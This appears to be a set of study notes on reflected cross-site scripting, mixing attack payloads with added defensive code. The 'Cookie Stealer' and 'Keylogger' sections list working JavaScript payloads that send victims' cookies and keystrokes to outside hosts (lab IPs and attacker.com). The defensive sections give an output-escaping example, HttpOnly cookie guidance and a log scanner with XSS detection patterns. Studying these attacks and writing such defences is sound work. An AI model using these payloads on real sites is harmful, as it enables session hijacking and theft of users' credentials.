XSS Reflected

Reflected XSS

This starts with an attacker crafting a malicious URL and then encouraging a user to click it. The malicious URL is often placed within a phishing email, but it could also be placed on a public website, such as a link within a comment. When the user clicks the malicious URL, it sends an HTTP request to a server with the user's cookie, which the attacker can use to hijack the user/admin account through what's called session hijacking. To summarize, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

Entry points

  • Parameters in the URL Query String

  • URL File Path

  • Sometimes HTTP Headers

  • Search Fields

  • Comment sections

  • Contact Forms
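The query-string entry point above is the one that shows the defect most directly, so here is an added example (not code from the original notes) of a search handler that reflects the "q" parameter into its HTML: first the vulnerable form, then the same template hardened with output encoding for the context the value lands in. It assumes plain Node.js; the route, parameter name and markup are made up for illustration.

```javascript
// Added example, not from the original notes: a search page that reflects the
// "q" query-string parameter into its HTML, shown first as the vulnerable form
// and then hardened with context-appropriate output encoding.
// Assumptions: plain Node.js (no framework); the route, parameter name and
// markup are made up for illustration.

// Replacement table for the five characters that matter in HTML text and
// double-quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pull a named parameter out of the request URL the way a handler would.
// A relative URL needs a base; the base itself is irrelevant here.
function getQueryParam(requestUrl, name) {
  return new URL(requestUrl, 'http://localhost').searchParams.get(name) ?? '';
}

// VULNERABLE: the parameter is concatenated straight into the HTML body and
// into an attribute, so a value such as <script>...</script> (or "> to break
// out of the input tag) becomes part of the page.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>\n<input type="text" name="q" value="${query}">`;
}

// HARDENED: the same template, but every reflected value is encoded for the
// context it lands in (HTML text and a quoted attribute both need < > & " ').
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<h1>Results for ${q}</h1>\n<input type="text" name="q" value="${q}">`;
}

// Check helper: does the rendered page still contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run directly to see both renderings for a constructed request URL.
if (typeof require !== 'undefined' && require.main === module) {
  const q = getQueryParam('/search?q=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E', 'q');
  console.log('vulnerable:\n' + renderSearchVulnerable(q));
  console.log('hardened:\n' + renderSearchSafe(q));
}
```

Encoding must match the output context: the table above covers HTML text and double-quoted attributes, but a value placed inside a script block, a URL or a CSS property needs a different encoder, and a template engine that auto-escapes by default removes the chance of forgetting the call.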

Example Payloads

JS

<script>alert("Hello")</script>

<script>alert(window.location.hostname)</script>

"><script>alert('XSS');</script>
[suitable for breaking out of input tags]

<textarea><script>alert('THM');</script>
[suitable for breaking out of text areas]

';alert('Hi_There');//'

Cookie Stealer

[1] JS

<script>fetch('http://10.8.133.250:8000/steal?cookie=' + btoa(document.cookie));</script>

[2] JS

<script>window.location='http://10.8.133.250:8000/cookie?'+document.cookie;</script>

[3] JS

<script>var myimg = new Image(); myimg.src = 'http://10.14.2.200/q?a=' + document.cookie;</script>

[4] JS

<script>document.location='http://ip:8000/XSS/grabber.php?c='+document.cookie;</script>
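All four cookie stealers above depend on two things: script being able to read document.cookie, and the request carrying the payload reaching the server. The following added example (not code from the original notes) covers the defender's side of both: a session Set-Cookie header with HttpOnly plus a parser to verify the flag is present, and a scanner over access-log lines that flags request paths carrying the indicators these payloads leave behind. It assumes Node.js; the cookie name, the combined-log-format lines and the addresses in them are constructed.

```javascript
// Added example, not from the original notes: the defender's side of the
// cookie-stealing payloads above. (1) A session cookie header with HttpOnly,
// which keeps document.cookie from exposing it, and a parser to verify the flag.
// (2) A scanner over access-log lines that flags request paths carrying the
// indicators those payloads leave behind. Assumptions: Node.js; cookie name,
// log format (combined log format) and the log lines themselves are constructed.

function sessionCookieHeader(name, value) {
  // HttpOnly: not readable by script; Secure: HTTPS only; SameSite: limits cross-site sends.
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Minimal Set-Cookie parser: first segment is name=value, the rest are attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split('=');
  const attrs = {};
  for (const part of parts.slice(1)) {
    const [k, v] = part.split('=');
    attrs[k.toLowerCase()] = v === undefined ? true : v;
  }
  return { name, value: valueParts.join('='), attrs };
}

// True when an injected script could read this cookie via document.cookie.
function cookieReadableByScript(header) {
  return !parseSetCookie(header).attrs.httponly;
}

// Strings the payloads above leave in the request URL. Matched after decoding.
const XSS_INDICATORS = [/<script\b/i, /document\.cookie/i, /btoa\s*\(/i];

// Percent-decode a path; malformed sequences fall back to the raw string.
function decodeLoose(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

// Scan combined-log-format lines; return the decoded path and indicator count
// for every request that matches at least one indicator.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /"(?:GET|POST) (\S+) HTTP\//.exec(line);
    if (!m) continue;
    const path = decodeLoose(m[1]);
    const hits = XSS_INDICATORS.filter((re) => re.test(path)).length;
    if (hits > 0) findings.push({ path, hits });
  }
  return findings;
}

// Constructed log lines (RFC 5737 documentation addresses, made-up timestamps).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=laptops HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=%3Cscript%3Efetch(%27http%3A%2F%2F203.0.113.10%3A8000%2F%3Fc%3D%27%2Bbtoa(document.cookie))%3C%2Fscript%3E HTTP/1.1" 200 612',
  '198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "GET /profile?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 300',
  '198.51.100.8 - - [10/Oct/2023:13:58:40 +0000] "POST /contact HTTP/1.1" 302 0',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(sessionCookieHeader('session', 'abc123'));
  console.log(scanAccessLog(SAMPLE_LOG));
}
```

HttpOnly removes the cookie from what an injected script can read, but it does not stop the script from running; output encoding at the reflection point and a Content-Security-Policy whose connect-src and img-src do not allow arbitrary hosts are what limit the fetch, location and Image() exfiltration channels listed above. The log scanner is deliberately simple (three decoded indicators); it will miss obfuscated payloads and is meant as a triage pass over request paths, not a replacement for a WAF or a proper detection rule set.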

Keylogger

<script>document.onkeypress = 
    function(e) {
        fetch('http://attacker.com/log?key=' + btoa(e.key));
    }</script>
